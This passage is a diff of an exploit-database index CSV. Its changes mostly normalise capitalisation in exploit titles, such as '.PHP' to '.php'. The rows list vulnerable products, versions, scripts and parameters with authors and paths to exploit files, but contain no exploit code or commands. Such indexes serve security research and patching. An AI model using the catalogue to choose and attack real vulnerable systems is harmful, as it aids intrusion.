Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x GetImage Arbitrary File Download Vulnerability",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 @@ -27582,24 +27583,24 @@ id,file,description,date,author,platform,type,port 30644,platforms/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,dos,0 30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution Vulnerability",2007-10-05,"Billy Rios",windows,remote,0 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability",2007-07-16,"Nobuhiro Ban",linux,dos,0 -30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.PHP Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0 +30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.php Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0 30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection Vulnerability",2007-10-09,"Radu State",hardware,remote,0 30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include Vulnerability",2007-10-10,Cyber-Crime,php,webapps,0 30652,platforms/hardware/remote/30652.txt,"Cisco IOS <= 12.3 LPD Remote Buffer Overflow Vulnerability",2007-10-10,"Andy Davis",hardware,remote,0 -30653,platforms/php/webapps/30653.txt,"phpMyAdmin <= 2.11.1 Setup.PHP Cross-Site Scripting Vulnerability",2007-10-09,"Omer Singer",php,webapps,0 -30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 Index.PHP Cross-Site Scripting Vulnerability",2007-10-11,durito,php,webapps,0 +30653,platforms/php/webapps/30653.txt,"phpMyAdmin <= 2.11.1 - Setup.php Cross-Site Scripting Vulnerability",2007-10-09,"Omer Singer",php,webapps,0 +30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 Index.php Cross-Site Scripting Vulnerability",2007-10-11,durito,php,webapps,0 30655,platforms/php/webapps/30655.txt,"Joomla! 1.0.13 - Search Component SearchWord Cross-Site Scripting Vulnerability",2007-10-11,MustLive,php,webapps,0 -30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 Index.PHP Local File Include Vulnerability",2007-10-11,iNs,php,webapps,0 -30657,platforms/php/webapps/30657.txt,"UMI CMS Index.PHP Cross-Site Scripting Vulnerability",2007-10-11,anonymous,php,webapps,0 +30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 Index.php Local File Include Vulnerability",2007-10-11,iNs,php,webapps,0 +30657,platforms/php/webapps/30657.txt,"UMI CMS Index.php Cross-Site Scripting Vulnerability",2007-10-11,anonymous,php,webapps,0 30658,platforms/php/webapps/30658.txt,"CRS Manager Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0 -30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 Index.PHP Cross-Site Scripting Vulnerability",2007-10-11,MustLive,php,webapps,0 -30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses Detail.PHP Multiple SQL Injection Vulnerabilities",2007-10-11,durito,php,webapps,0 +30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 Index.php Cross-Site Scripting Vulnerability",2007-10-11,MustLive,php,webapps,0 +30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses Detail.php Multiple SQL Injection Vulnerabilities",2007-10-11,durito,php,webapps,0 30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 Report.CGI Authorization Bypass Vulnerability",2007-10-11,MustLive,cgi,webapps,0 -30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 Content Management System Main.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0 -30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.PHP Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0 -30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0 +30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 Content Management System Main.php SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0 +30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.php Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0 +30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.php SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0 30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE_ NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27636,30 +27637,30 @@ id,file,description,date,author,platform,type,port 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 -30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.PHP Cross-Site Scripting Vulnerability",2007-10-19,"Ivan Sanchez",php,webapps,0 -30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 +30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.php Cross-Site Scripting Vulnerability",2007-10-19,"Ivan Sanchez",php,webapps,0 +30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting Vulnerability",2007-10-20,"Aria-Security Team",asp,webapps,0 -30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.PHP Local File Include Vulnerability",2007-10-20,sekuru,php,webapps,0 +30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.php Local File Include Vulnerability",2007-10-20,sekuru,php,webapps,0 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module Unauthorized Access Vulnerability",2007-10-22,KiNgOfThEwOrLd,php,webapps,0 -30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.PHP Cross-Site Scripting Vulnerability",2007-10-22,Matrix86,php,webapps,0 -30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 Index.PHP SQL Injection Vulnerability",2007-10-22,"Aria-Security Team",php,webapps,0 -30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.PHP Local File Include Vulnerability",2007-10-22,hack2prison,php,webapps,0 +30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.php Cross-Site Scripting Vulnerability",2007-10-22,Matrix86,php,webapps,0 +30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 Index.php SQL Injection Vulnerability",2007-10-22,"Aria-Security Team",php,webapps,0 +30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.php Local File Include Vulnerability",2007-10-22,hack2prison,php,webapps,0 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 Malformed XBL Constructor Remote Denial of Service Vulnerability",2007-10-22,"Soroush Dalili",multiple,dos,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload Vulnerability",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0 -30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0 +30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.php Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0 30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Remote Directory Traversal Vulnerability",2007-10-25,"Pete Foster",linux,remote,0 -30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 +30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.php Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service Vulnerability",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow Vulnerability",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 -30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.PHP - Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0 +30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.php - Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0 -30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.PHP Cross-Site Scripting Vulnerability",2007-10-29,Doz,php,webapps,0 -30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0 -30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.PHP SQL Injection Vulnerability",2007-10-29,netVigilance,php,webapps,0 +30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.php Cross-Site Scripting Vulnerability",2007-10-29,Doz,php,webapps,0 +30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.php Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0 +30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.php SQL Injection Vulnerability",2007-10-29,netVigilance,php,webapps,0 30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow Vulnerability",2007-10-29,anonymous,windows,remote,0 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting Vulnerability",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty Password Parameters SQL Injection Vulnerability",2007-11-26,"Aria-Security Team",asp,webapps,0 @@ -27672,31 +27673,31 @@ id,file,description,date,author,platform,type,port 30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 -30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 -30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.PHP Information Disclosure Vulnerability",2007-11-01,d3hydr8,php,webapps,0 -30733,platforms/php/webapps/30733.txt,"phpMyAdmin <= 2.11.1 Server_Status.PHP Cross-Site Scripting Vulnerability",2007-10-17,"Omer Singer",php,webapps,0 -30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.PHP Cross-Site Scripting Vulnerability",2007-11-02,"Ivan Sanchez",php,webapps,0 -30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.PHP Local File Include Vulnerability",2007-11-03,joseph.giron13,php,webapps,0 +30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.php Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 +30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.php Information Disclosure Vulnerability",2007-11-01,d3hydr8,php,webapps,0 +30733,platforms/php/webapps/30733.txt,"phpMyAdmin <= 2.11.1 - Server_Status.php Cross-Site Scripting Vulnerability",2007-10-17,"Omer Singer",php,webapps,0 +30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.php Cross-Site Scripting Vulnerability",2007-11-02,"Ivan Sanchez",php,webapps,0 +30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.php Local File Include Vulnerability",2007-11-03,joseph.giron13,php,webapps,0 30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution Vulnerability",2007-11-02,"Drake Wilson",linux,remote,0 -30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 Upload_Config.PHP Remote File Include Vulnerability",2007-11-05,"arfis project",php,webapps,0 -30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.PHP SQL Injection Vulnerability",2007-11-05,R00t[ATI],php,webapps,0 -30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.PHP Cross-Site Scripting Vulnerability",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 +30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 Upload_Config.php Remote File Include Vulnerability",2007-11-05,"arfis project",php,webapps,0 +30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.php SQL Injection Vulnerability",2007-11-05,r00t,php,webapps,0 +30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.php Cross-Site Scripting Vulnerability",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass Vulnerability",2007-11-05,"David Smith",hardware,remote,0 -30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0 +30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.php Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0 30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - (Buffer Overflow & Remote Command Execution) Multiple Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0 30744,platforms/linux/dos/30744.txt,"MySQL <= 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,dos,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross-Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0 -30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.PHP SQL Injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0 +30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.php SQL Injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0 30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability",2007-11-12,"Elazar Broad",windows,dos,0 -30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0 -30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0 -30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0 -30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,dos,0 -30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0 -30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0 +30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.php SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0 +30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.php Cross-Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0 +30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.php Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0 +30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - Index.php Denial of Service Vulnerability",2007-11-12,L4teral,php,dos,0 +30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.php Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0 +30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.php3 - Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0 30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 @@ -27705,7 +27706,7 @@ id,file,description,date,author,platform,type,port 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting Vulnerability",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service Vulnerability",2007-11-14,"laurent gaffie",linux,dos,0 -30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 Dialog.PHP Unauthorized Access Vulnerability",2007-11-14,d3hydr8,php,webapps,0 +30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 Dialog.php Unauthorized Access Vulnerability",2007-11-14,d3hydr8,php,webapps,0 30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 30766,platforms/linux/dos/30766.c,"GNU TAR <= 1.15.91 and CPIO <= 2.5.90 safer_name_suffix Remote Denial of Service Vulnerability",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow Vulnerability",2007-06-25,"Azizov E",windows,dos,0 @@ -27733,9 +27734,9 @@ id,file,description,date,author,platform,type,port 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 -30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 Index.PHP Cross-Site Scripting Vulnerability",2007-11-26,JosS,php,webapps,0 +30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 Index.php Cross-Site Scripting Vulnerability",2007-11-26,JosS,php,webapps,0 30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 Ierpplug.DLL PlayerProperty ActiveX Control Buffer Overflow Vulnerability",2007-11-26,"Elazar Broad",windows,dos,0 -30813,platforms/php/webapps/30813.txt,"FMDeluxe 2.1 Index.PHP Cross-Site Scripting Vulnerability",2007-11-26,JosS,php,webapps,0 +30813,platforms/php/webapps/30813.txt,"FMDeluxe 2.1 Index.php Cross-Site Scripting Vulnerability",2007-11-26,JosS,php,webapps,0 30814,platforms/multiple/dos/30814.txt,"Skype 3.6.216 Voicemail URI Handler Remote Denial of Service Vulnerability",2007-11-26,"Critical Security",multiple,dos,0 30815,platforms/php/webapps/30815.txt,"Tilde 4.0 Aarstal Parameter Cross-Site Scripting Vulnerability",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 30816,platforms/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,windows,remote,0 @@ -27755,10 +27756,10 @@ id,file,description,date,author,platform,type,port 30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service Vulnerability",2007-11-29,"Elazar Broad",windows,dos,0 -30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0 -30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0 +30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.php3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0 +30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.php3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 -30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0 +30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.php SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Local Privilege Escalation Vulnerability",2007-12-03,"Bas van Schaik",linux,local,0 @@ -27775,8 +27776,8 @@ id,file,description,date,author,platform,type,port 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0 -30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0 -30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 +30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.php Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0 +30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.php Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0 30856,platforms/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x - Directory Traversal and Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",multiple,dos,0 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0 @@ -27802,7 +27803,7 @@ id,file,description,date,author,platform,type,port 30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 -30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 +30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0 @@ -27825,7 +27826,7 @@ id,file,description,date,author,platform,type,port 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0 30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack-Based Buffer Overflow Vulnerability",2007-12-21,"Luigi Auriemma",multiple,dos,0 30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0 -30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.PHP ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0 